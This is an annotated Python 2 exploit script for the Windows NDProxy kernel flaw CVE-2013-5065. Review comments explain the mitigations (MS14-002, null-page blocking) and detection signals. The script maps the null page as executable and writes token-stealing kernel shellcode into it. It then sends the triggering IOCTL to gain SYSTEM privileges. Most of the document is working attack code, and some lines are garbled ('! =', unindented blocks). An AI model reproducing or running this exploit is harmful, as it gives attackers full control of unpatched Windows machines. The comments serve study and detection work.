from ctypes import *
from ctypes.wintypes import *
import os, sys
# Win32 / NT API entry points reached through ctypes (Windows only; windll
# is the stdcall loader).  kernel32 is used for WriteProcessMemory,
# CreateFileA, DeviceIoControl, CloseHandle and error formatting; ntdll
# only for NtAllocateVirtualMemory.
kernel32 = windll.kernel32
ntdll = windll.ntdll
# Standard Win32 access, share-mode and disposition flags.  Only
# OPEN_EXISTING is referenced in the visible script; the CreateFileA call
# below passes 0 for both desired access and share mode.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
# Process access rights; not referenced in the visible script (the memory
# calls use the 0xFFFFFFFF current-process pseudo-handle instead of
# OpenProcess).
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
# VirtualAlloc-style allocation type and protection flags.  MEMRES and
# PAGEEXE below carry the same values as MEM_COMMIT|MEM_RESERVE and
# PAGE_EXECUTE_READWRITE and are the names actually used; MEM_FREE,
# PROCESS_ALL_ACCESS (0x1FFFFF) and MEM_DECOMMIT are not referenced.
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = 2097151
# FormatMessageA flag used by getLastError() to render a Win32 error code.
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
# Requested base address for the NtAllocateVirtualMemory call.  The NT
# allocator rounds a non-aligned base down to a page boundary, so asking
# for 0x1 maps page 0 -- the user-mode "null page".  Windows 8 and later
# refuse such an allocation outright; that refusal (and EMET's null-page
# mitigation on older releases) is the mitigation this script depends on
# being absent.
baseadd = c_int( 0x00000001 )
MEMRES = ( 0x1000 | 0x2000 )
MEM_DECOMMIT = 0x4000
PAGEEXE = 0x00000040
# Size of the allocation: exactly one 4 KiB page.
null_size = c_int( 0x1000 )
# NTSTATUS value returned by ntdll on success.
STATUS_SUCCESS = 0
def log(msg):
    """Write *msg* to standard output, followed by a newline.

    Thin wrapper kept so every diagnostic in the script goes through one
    place.  Returns nothing.
    """
    print(msg)
def getLastError():
    """Log the system text for the calling thread's last Win32 error.

    Reads the error code through kernel32.GetLastError() and renders it
    with FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, ...).  If
    FormatMessageA returns 0 (no text could be produced) a fixed
    "[-] Unknown Error" line is logged instead.  Returns nothing.

    NOTE(review): reading the error code via windll after other ctypes
    calls can yield a stale value, since ctypes itself may call Win32 APIs
    in between; ctypes' use_last_error / get_last_error() is the reliable
    route.  Left as-is here.
    """
    message = create_string_buffer(2048)
    chars_written = kernel32.FormatMessageA(
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        kernel32.GetLastError(),
        0,
        message,
        sizeof(message),
        NULL,
    )
    if not chars_written:
        log("[-] Unknown Error")
        return
    log(message.value)
# Banner.  The whole script is Python 2 (print statements).
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"
# Input buffer for the IOCTL.  As concatenated it is 92 bytes long; the
# DeviceIoControl call below passes 0x54 (84) of them as the input length
# and receives up to 0x24 bytes back into the same buffer.
tmp = ( "\x00" * 4 ) * 5 + "\x25\x01\x03\x07" + "\x00" * 4 + "\x34\x00\x00\x00" + "\x00" * ( 84 - 24 )
InBuf = c_char_p(tmp)
# Step 1: map one RWX page at the null page of this process.  0xFFFFFFFF is
# the current-process pseudo-handle (-1 as a 32-bit HANDLE); base 0x1 is
# rounded down to page 0.  This is the step null-page mitigations block:
# Windows 8+ refuse the allocation, EMET's null-page mitigation covers
# Windows 7.  From a detection standpoint, a user-mode process calling
# NtAllocateVirtualMemory with base 0 and PAGE_EXECUTE_READWRITE is a
# strong signal on its own.
dwStatus = ntdll.NtAllocateVirtualMemory( 0xFFFFFFFF , byref(baseadd), 0x0 , byref(null_size), MEMRES, PAGEEXE)
# NTSTATUS != 0 means the allocation failed; note the script only reports
# the failure and carries on.
if dwStatus ! = STATUS_SUCCESS:
print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
getLastError()
written = c_ulong()
# sh is the kernel-mode payload; sc pads it into the 0x400-byte image that
# gets written at address 0x1 (nop sled ahead of sh, 0xcc fill after it).
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc = "\x90" * 0x38 + "\x3c\x00\x00\x00" + "\x90" * 4 + sh + "\xcc" * ( 0x400 - 0x3c - 4 - len (sh))
# Step 2: copy the image into the page just mapped, again via the
# current-process pseudo-handle.  WriteProcessMemory returns 0 on failure.
alloc = kernel32.WriteProcessMemory( 0xFFFFFFFF , 0x00000001 , sc, 0x400 , byref(written))
if alloc = = 0 :
print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
getLastError()
dwRetBytes = DWORD( 0 )
# Step 3: open the NDProxy kernel driver's device object and send the
# triggering IOCTL.  An ordinary (non-RAS) process opening \\.\NDProxy and
# issuing control code 0x8fff23cc is the observable trigger for this bug.
# The fix is MS14-002; Microsoft's pre-patch advisory workaround rerouted
# NDProxy.sys to Null.sys (at the cost of RAS / VPN / dial-up).
DEVICE_NAME = "\\\\.\\NDProxy"
hdev = kernel32.CreateFileA(DEVICE_NAME, 0 , 0 , None , OPEN_EXISTING , 0 , None )
# CreateFileA reports failure as INVALID_HANDLE_VALUE, seen here as -1.
if hdev = = - 1 :
print "[-] Couldn't open the device... :("
sys.exit()
# DeviceIoControl's return value and dwRetBytes are not examined.
kernel32.DeviceIoControl(hdev, 0x8fff23cc , InBuf, 0x54 , InBuf, 0x24 , byref(dwRetBytes), 0 )
kernel32.CloseHandle(hdev)
# Nothing in this excerpt actually spawns a process after the print; the
# step it announces, if any, lies outside the visible lines.
print "[+] Spawning SYSTEM Shell..."